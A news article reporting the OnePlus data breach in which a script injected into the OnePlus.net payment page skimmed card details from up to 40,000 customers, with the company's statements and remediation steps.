OnePlus has confirmed it suffered a major data breach potentially compromising the payment card details of up to 40,000 customers. In an email sent to customers on Friday, 19 January, the Chinese phone maker said its website, OnePlus.net, was hacked with a malicious script injected into the company's payment page designed to harvest sensitive data from visitors' browsers.
"The malicious script operated intermittently, capturing and sending data directly from the user's browser. It has since been eliminated," OnePlus said in a statement. "We have quarantined the infected server and reinforced all relevant system structures."
Customers who entered their credit card details on OnePlus' website between mid-November, 2017 and 11 January, 2018 may have been affected by the breach. Compromised data includes customers' credit card numbers, expiry dates and security codes.
The company said users who paid with a previously saved credit card on file, PayPal or the "Credit card via PayPal" methods "should not be affected" by the intrusion. It added that customers card details are never processed or stored on the OnePlus.net site.
"It is sent directly to our PCI-DSS-compliant payment processing partner over an encrypted connection, and processed on their secure servers," it noted.
Only potentially affected users have received a notification email regarding the breach and have been offered a year of credit monitoring.
The disclosure comes several days after reports of credit card fraud began popping up earlier this month after users' purchased OnePlus products from the official OnePlus.net store. The company temporarily shut down credit card payments for its online store last week and launched an investigation into the "serious issue" with the assistance of a third-party security firm.
The issue was first reported by forum user @superdutynick.
OnePlus has not provided any details of the cause of the breach or when the malicious script was inserted by hackers.
Customers have been advised to check their payment card statements for any potentially suspicious activity.
"We cannot apologise enough for letting something like this happen. We are eternally grateful to have such a vigilant and informed community, and it pains us to let you down," the company said. "We are in contact with potentially affected customers. We are working with our providers and local authorities to better address the incident.
"We are also working with our current payment providers to implement a more secure credit card payment method, as well as conducting an in-depth security audit. All these measures will help us prevent such incidents from happening in the future."